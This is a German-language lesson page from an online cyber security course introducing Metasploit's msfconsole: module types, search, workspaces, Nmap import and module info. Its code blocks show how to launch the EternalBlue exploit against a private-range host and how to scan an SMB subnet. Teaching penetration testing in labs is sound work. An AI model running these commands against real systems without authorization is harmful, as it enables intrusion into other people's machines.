0Pricing
Cyber Security Academy · Lektion

Metasploit-Architektur und msfconsole

Navigieren Sie durch msfconsole, verstehen Sie die Struktur von Exploits, Payloads und Modulen und konfigurieren Sie Optionen.

Metasploit-Architektur und msfconsole ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 1 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was ist Metasploit?

Das Metasploit Framework ist eine Open-Source-Plattform für Penetrationstests mit einer einheitlichen Oberfläche zum Entwickeln, Testen und Ausführen von Exploits. Es ist das branchenübliche Werkzeug für autorisierte Exploitation in Laborumgebungen.

Metasploit-Komponenten

Zu den wichtigsten Komponenten gehören: msfconsole (interaktive CLI), msfvenom (Payload-Generator), Metasploit DB (PostgreSQL zum Speichern von Hosts und Sitzungen) und Armitage (grafisches Front-End).

msfconsole starten

Starten Sie msfconsole und initialisieren Sie die Datenbank. Die Eingabeaufforderung wechselt zu msf6 >. Die Tab-Vervollständigung funktioniert bei allen Befehlen, Modulnamen und Optionen.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Modultypen

Metasploit organisiert seine Funktionen in verschiedene Modultypen: exploit (angriffsspezifischer Code für eine Schwachstelle), payload (Code, der nach der Ausnutzung ausgeführt wird), auxiliary (Scanner und Fuzzer), post (Post-Exploitation), encoder und nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Nach Modulen suchen

Der Befehl search filtert Module nach Name, CVE, Plattform oder Rang. Der Modulrang gibt die Zuverlässigkeit an: Excellent > Great > Good > Normal > Average > Low.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

Ein Exploit-Modul verwenden

Wählen Sie mit use ein Modul aus, zeigen Sie mit show options die erforderlichen Optionen an, legen Sie mit set die Werte fest und führen Sie das Modul mit run oder exploit aus.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Globale Optionen festlegen

Mit setg legen Sie Optionen global für alle folgenden Module fest – nützlich für LHOST, LPORT und RHOSTS, die während eines gesamten Auftrags unverändert bleiben.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Auxiliary-Module

Auxiliary-Module führen Scans, Enumeration und Fuzzing durch, ohne Payloads bereitzustellen. Beispiele sind ein SMB-Version-Scanner, ein Brute-Force-Scanner für SSH-Anmeldungen und ein HTTP-Verzeichnis-Scanner.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Arbeitsbereiche verwalten

Arbeitsbereiche organisieren Scan-Daten und Sitzungen für einzelne Aufträge. Erstellen Sie zu Beginn jeder Prüfung einen neuen Arbeitsbereich, damit die Daten getrennt bleiben.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Nmap-Integration

Importieren Sie Nmap-Scanergebnisse im XML-Format direkt in die Metasploit-Datenbank. Dadurch werden die Tabellen für Hosts und Dienste gefüllt und eine gezielte Modulauswahl ermöglicht.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Hilfe und Dokumentation

Jedes Modul verfügt über eine integrierte Dokumentation. Verwenden Sie info, um die Modulbeschreibung, die Zuverlässigkeitsbewertung, Referenzen (CVE-Nummern und Advisories) sowie die erforderlichen Optionen zu lesen.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Kurzer Test

Welcher Befehl wählt in msfconsole ein Modul aus?

Zusammenfassung: Metasploit-Architektur

msfconsole ist die zentrale Anlaufstelle: Suchen Sie nach Modulen, legen Sie Optionen fest, führen Sie Exploits aus und verwalten Sie Sitzungen. Arbeiten Sie immer innerhalb eines benannten Arbeitsbereichs, importieren Sie Nmap-Ergebnisse zum Befüllen der Datenbank und lesen Sie die Modulbeschreibung, bevor Sie etwas ausführen – verstehen Sie, was Sie ausführen und warum.

Häufig gestellte Fragen

Ist die Lektion „Metasploit-Architektur und msfconsole“ kostenlos?

Ja — der vollständige Text von „Metasploit-Architektur und msfconsole“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Metasploit-Architektur und msfconsole“?

Navigieren Sie durch msfconsole, verstehen Sie die Struktur von Exploits, Payloads und Modulen und konfigurieren Sie Optionen. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Cyber Security Academy zu starten?

Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 1 von 4.

Wie lange dauert die Lektion „Metasploit-Architektur und msfconsole“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?

Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Metasploit-Architektur und msfconsole
  2. Eine bekannte Schwachstelle ausnutzen
  3. Payloads: Staged vs. Stageless und Meterpreter
  4. Post-Exploitation: Pivoting und Persistenz
← Zurück zu Cyber Security Academy